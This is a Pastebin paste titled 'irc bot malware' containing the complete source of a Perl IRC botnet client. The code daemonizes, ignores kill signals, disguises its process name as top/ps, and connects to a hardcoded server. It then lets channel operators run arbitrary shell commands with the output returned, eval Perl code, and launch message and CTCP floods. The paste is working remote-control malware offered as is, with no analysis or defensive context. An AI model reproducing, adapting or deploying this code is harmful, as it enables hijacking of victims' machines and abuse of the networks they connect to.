Advertisement
Guest User

irc bot malware

a guest
Jan 20th, 2020
436
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.31 KB | None | 0 0
  1. #!/usr/bin/perl
  2. my $processo =("top","htop","ps");
  3.  
  4. my @titi = ("index.php?page=","main.php?page=");
  5.  
  6. my $goni = $titi[rand scalar @titi];
  7.  
  8. my $linas_max='3';
  9. my $sleep='7';
  10. my @adms=("x", "y", "z", "w", "q", "e", "r", "t", "y");
  11. my @hostauth=("local");
  12. my @canais=("#tn");
  13. chop (my $nick = `uname`);
  14. my $servidor="3.4.5.6";
  15. my $ircname =("g");
  16. my $realname = ("g");
  17. my @ircport = ("22","80");
  18. my $porta = $ircport[rand scalar @ircport];
  19. my $VERSAO = '0.5';
  20. $SIG{'INT'} = 'IGNORE';
  21. $SIG{'HUP'} = 'IGNORE';
  22. $SIG{'TERM'} = 'IGNORE';
  23. $SIG{'CHLD'} = 'IGNORE';
  24. $SIG{'PS'} = 'IGNORE';
  25. use IO::Socket;
  26. use Socket;
  27. use IO::Select;
  28. chdir("/tmp");
  29. $servidor="$ARGV[0]" if $ARGV[0];
  30. $0="$processo"."\0"x16;;
  31. my $pid=fork;
  32. exit if $pid;
  33. die "Problema com o fork: $!" unless defined($pid);
  34.  
  35. our %irc_servers;
  36. our %DCC;
  37. my $dcc_sel = new IO::Select->new();
  38.  
  39. $sel_cliente = IO::Select->new();
  40. sub sendraw {
  41. if ($#_ == '1') {
  42. my $socket = $_[0];
  43. print $socket "$_[1]\n";
  44. } else {
  45. print $IRC_cur_socket "$_[0]\n";
  46. }
  47. }
  48.  
  49. sub conectar {
  50. my $meunick = $_[0];
  51. my $servidor_con = $_[1];
  52. my $porta_con = $_[2];
  53.  
  54. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  55. if (defined($IRC_socket)) {
  56. $IRC_cur_socket = $IRC_socket;
  57.  
  58. $IRC_socket->autoflush(1);
  59. $sel_cliente->add($IRC_socket);
  60.  
  61. $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  62. $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  63. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  64. $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  65. nick("$meunick");
  66. sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  67. sleep 1;
  68. }
  69. }
  70. my $line_temp;
  71. while( 1 ) {
  72. while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  73. delete($irc_servers{''}) if (defined($irc_servers{''}));
  74. my @ready = $sel_cliente->can_read(0);
  75. next unless(@ready);
  76. foreach $fh (@ready) {
  77. $IRC_cur_socket = $fh;
  78. $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  79. $nread = sysread($fh, $msg, 4096);
  80. if ($nread == 0) {
  81. $sel_cliente->remove($fh);
  82. $fh->close;
  83. delete($irc_servers{$fh});
  84. }
  85. @lines = split (/\n/, $msg);
  86.  
  87. for(my $c=0; $c<= $#lines; $c++) {
  88. $line = $lines[$c];
  89. $line=$line_temp.$line if ($line_temp);
  90. $line_temp='';
  91. $line =~ s/\r$//;
  92. unless ($c == $#lines) {
  93. parse("$line");
  94. } else {
  95. if ($#lines == 0) {
  96. parse("$line");
  97. } elsif ($lines[$c] =~ /\r$/) {
  98. parse("$line");
  99. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  100. parse("$line");
  101. } else {
  102. $line_temp = $line;
  103. }
  104. }
  105. }
  106. }
  107. }
  108.  
  109. sub parse {
  110. my $servarg = shift;
  111. if ($servarg =~ /^PING \:(.*)/) {
  112. sendraw("PONG :$1");
  113. } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  114. my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  115. if ($args =~ /^\001VERSION\001$/) {
  116. notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
  117. }
  118. if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
  119. if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
  120. if ($onde eq "$meunick"){
  121. shell("$pn", "$args");
  122. }
  123. if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
  124. my $natrix = $1;
  125. my $arg = $2;
  126. if ($arg =~ /^\!(.*)/) {
  127. ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
  128. } elsif ($arg =~ /^\@(.*)/) {
  129. $ondep = $onde;
  130. $ondep = $pn if $onde eq $meunick;
  131. bfunc("$ondep","$1");
  132. } else {
  133. shell("$onde", "$arg");
  134. }
  135. }
  136. }
  137. }
  138. } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  139. if (lc($1) eq lc($meunick)) {
  140. $meunick=$4;
  141. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  142. }
  143. } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  144. nick("$meunick|".int rand(999999));
  145. } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  146. $meunick = $2;
  147. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  148. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  149. foreach my $canal (@canais) {
  150. sendraw("JOIN $canal ddosit");
  151. }
  152. }
  153. }
  154.  
  155.  
  156.  
  157. sub ircase {
  158. my ($kem, $printl, $case) = @_;
  159.  
  160. if ($case =~ /^join (.*)/) {
  161. j("$1");
  162. }
  163.  
  164. if ($case =~ /^refresh (.*)/) {
  165. my $goni = $titi[rand scalar @titi];
  166. }
  167.  
  168. if ($case =~ /^part (.*)/) {
  169. p("$1");
  170. }
  171. if ($case =~ /^rejoin\s+(.*)/) {
  172. my $chan = $1;
  173. if ($chan =~ /^(\d+) (.*)/) {
  174. for (my $ca = 1; $ca <= $1; $ca++ ) {
  175. p("$2");
  176. j("$2");
  177. }
  178. } else {
  179. p("$chan");
  180. j("$chan");
  181. }
  182. }
  183. if ($case =~ /^op/) {
  184. op("$printl", "$kem") if $case eq "op";
  185. my $oarg = substr($case, 3);
  186. op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  187. }
  188. if ($case =~ /^deop/) {
  189. deop("$printl", "$kem") if $case eq "deop";
  190. my $oarg = substr($case, 5);
  191. deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  192. }
  193. if ($case =~ /^msg\s+(\S+) (.*)/) {
  194. msg("$1", "$2");
  195. }
  196. if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  197. for (my $cf = 1; $cf <= $1; $cf++) {
  198. msg("$2", "$3");
  199. }
  200. }
  201. if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  202. ctcp("$1", "$2");
  203. }
  204. if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  205. for (my $cf = 1; $cf <= $1; $cf++) {
  206. ctcp("$2", "$3");
  207. }
  208. }
  209. if ($case =~ /^nick (.*)/) {
  210. nick("$1");
  211. }
  212. if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  213. conectar("$2", "$1", 6667);
  214. }
  215. if ($case =~ /^raw (.*)/) {
  216. sendraw("$1");
  217. }
  218. if ($case =~ /^eval (.*)/) {
  219. eval "$1";
  220. }
  221. }
  222.  
  223. sub shell {
  224. my $printl=$_[0];
  225. my $comando=$_[1];
  226. if ($comando =~ /cd (.*)/) {
  227. chdir("$1") || msg("$printl", "No such file or directory");
  228. return;
  229. }
  230. elsif ($pid = fork) {
  231. waitpid($pid, 0);
  232. } else {
  233. if (fork) {
  234. exit;
  235. } else {
  236. my @resp=`$comando 2>&1 3>&1`;
  237. my $c=0;
  238. foreach my $linha (@resp) {
  239. $c++;
  240. chop $linha;
  241. sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  242. if ($c == "$linas_max") {
  243. $c=0;
  244. sleep $sleep;
  245. }
  246. }
  247. exit;
  248. }
  249. }
  250. }
  251.  
  252.  
  253. sub ctcp {
  254. return unless $#_ == 1;
  255. sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  256. }
  257. sub msg {
  258. return unless $#_ == 1;
  259. sendraw("PRIVMSG $_[0] :$_[1]");
  260. }
  261. sub notice {
  262. return unless $#_ == 1;
  263. sendraw("NOTICE $_[0] :$_[1]");
  264. }
  265. sub op {
  266. return unless $#_ == 1;
  267. sendraw("MODE $_[0] +o $_[1]");
  268. }
  269. sub deop {
  270. return unless $#_ == 1;
  271. sendraw("MODE $_[0] -o $_[1]");
  272. }
  273. sub j { &join(@_); }
  274. sub join {
  275. return unless $#_ == 0;
  276. sendraw("JOIN $_[0]");
  277. }
  278. sub p { part(@_); }
  279. sub part {
  280. sendraw("PART $_[0]");
  281. }
  282. sub nick {
  283. return unless $#_ == 0;
  284. sendraw("NICK $_[0]");
  285. }
  286. sub quit {
  287. sendraw("QUIT :$_[0]");
  288. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement